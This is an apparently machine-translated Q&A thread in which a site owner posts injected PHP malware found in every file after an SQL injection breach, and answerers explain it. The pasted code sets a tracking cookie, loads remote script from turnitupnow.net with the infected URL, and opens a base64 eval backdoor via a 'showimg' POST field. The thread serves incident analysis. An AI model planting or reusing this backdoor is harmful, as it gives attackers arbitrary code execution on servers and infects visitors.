我们的服务器通过一些SQL注入方法(现已修补)被黑客入侵。我们所有的PHP文件都将其添加到每个文件的最顶层。
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
似乎设置了一个cookie,但我不知道它的作用。
任何专家都能够理解这是什么以及创建的Cookie名称可能是什么样的,所以我可以告诉任何用户等
更新 看到这个漏洞是由于Zenphoto Gallery软件中的一个名为Tiny_MCE的插件。
答案 0 :(得分:10)
首先它设置一个cookie。 (命名为lb11)为值102。
如果(稍后?)找到cookie,它会将cookie设置为随机值 在1000到9000之间,所以它不会再次这样做:有用户吗? 请求(并执行)一个javascript,它发送哪些被感染的 URL进行了调用,然后刷新页面(因此没有任何内容出现 在javascript运行之后发生了。
但无论如何,如果将“showimg”参数传递给页面,那么 查看该页面的内容,并在服务器上执行它。
所以,如果这个代码存在,它将运行javascript,(它还通知服务器哪个URL被感染,然后让该人在受感染的服务器上运行任意代码(通过showimg参数)。
这有2层攻击,它可以用javascript攻击客户端,以后可以攻击服务器并在其上运行任意代码。
答案 1 :(得分:0)
我可能在这里错了,但从它的外观来看(没有测试代码中的链接);它可能试图注入一些可能是恶意的客户端JavaScript。这通常会使访问者的计算机感染恶意软件等。
饼干名称。我会让你的访问者删除你域名的所有cookie,但从它的外观来看,cookie被称为“lb11”
我并不想看你能理解的链接;)